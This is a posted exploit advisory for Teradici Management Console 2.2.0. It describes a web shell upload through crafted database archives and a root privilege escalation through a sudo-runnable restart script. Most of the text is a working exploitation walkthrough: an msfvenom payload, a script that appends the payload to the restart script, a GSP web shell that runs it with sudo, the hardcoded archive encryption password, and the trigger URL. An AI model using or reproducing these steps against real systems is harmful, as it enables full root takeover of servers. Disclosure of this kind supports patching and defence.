Home / os / winmobile

Teradici Management Console 2.2.0 Shell Upload / Privilege Escalation

Posted on 23 February 2017

# Exploit Title: Teradici Management Console 2.2.0 - Web Shell Upload and Privilege Escalation # Date: February 22nd, 2017 # Exploit Author: hantwister # Vendor Homepage: http://www.teradici.com/products-and-solutions/pcoip-products/management-console # Software Link: https://techsupport.teradici.com/ics/support/DLRedirect.asp?fileID=63583 (login required) # Version: 2.2.0 Users that can access the Settings > Database Management page can achieve code execution as root on older versions of PCoIP MC 2.x. (Based on CentOS 7 x64) Web Shell Upload Vulnerability Overview --------------------------------------- Database archives are extracted under /opt/jetty/tmpdeploy. By creating a malicious archive with a malicious web script that extracts to the known directory /opt/jetty/tmpdeploy/jetty-0.0.0.0-8080-console.war-_console-any- it is possible to add or modify class files and XML files pertaining to the application. Privilege Escalation Vulnerability Overview ------------------------------------------- The jetty user owns the file /opt/jetty/jetty_self_restart.sh, and the same user has sudo rights to run that file without a password. By manipulating this file, arbitrary code can be run as root. Exploiting The Vulnerabilities ------------------------------ alice:~$ mkdir -p runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images alice:~$ cd runasroot alice:~/runasroot$ msfvenom (snip) > evil alice:~/runasroot$ chmod a+x evil alice:~/runasroot$ nano modify_self_restart.sh #!/bin/bash echo /tmp/evil >> /opt/jetty/jetty_self_restart.sh alice:~/runasroot$ chmod a+x modify_self_restart.sh alice:~/runasroot$ cd jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ nano runasroot.gsp <html> <head> <title>runasroot</title> </head> <body> <pre> <% out << "cp /opt/jetty/tmpdeploy/evil /tmp/".execute().text %> <% out << "/opt/jetty/tmpdeploy/modify_self_restart.sh".execute().text %> <% out << "sudo /opt/jetty/jetty_self_restart.sh".execute().text %> </pre> </body> </html> alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ cd ../../.. alice:~/runasroot$ tar -zcf runasroot.tar.gz evil modify_self_restart.sh jetty-0.0.0.0-8080-console.war-_console-any- alice:~/runasroot$ openssl enc -e -aes-256-cbc -salt -in runasroot.tar.gz -out runasroot.archive -pass pass:4400Dominion -p Now, choose to upload runasroot.archive through the Database Management page. An error will be displayed that it wasn't a valid archive. Now, navigate to https://IP/console/images/runasroot.gsp

 

TOP